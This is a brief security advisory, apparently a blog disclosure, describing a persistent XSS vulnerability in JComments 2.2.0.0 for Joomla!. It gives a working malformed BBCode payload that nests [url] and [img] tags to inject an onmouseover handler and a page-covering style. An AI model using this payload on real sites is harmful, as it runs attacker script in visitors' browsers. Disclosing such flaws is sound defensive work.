jeffchannell.com

JComments 2.2.0.0 Persistent XSS

Posted in Joomla!
2010-09-05 18:55:54 +0000 UTC

JComments 2.2.0.0 suffers from a persistent XSS vulnerability in the way it handles certain BBCodes.

If [url] and [img] tags are available, the following malformed BBCode will result in code execution:

123456789 12345678 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
[url]x[url]s[/url]s[/url]!
" style="position: absolute; top:0px; left:0px; width: 99em; height: 99em" onmouseover = "location.href = String.fromCharCode( 35,88,83, 83,101, 100,32, 98,121, 32,106, 100,99 )" x="
[url]x[img]s[/url]s[/img]="!">

Timeline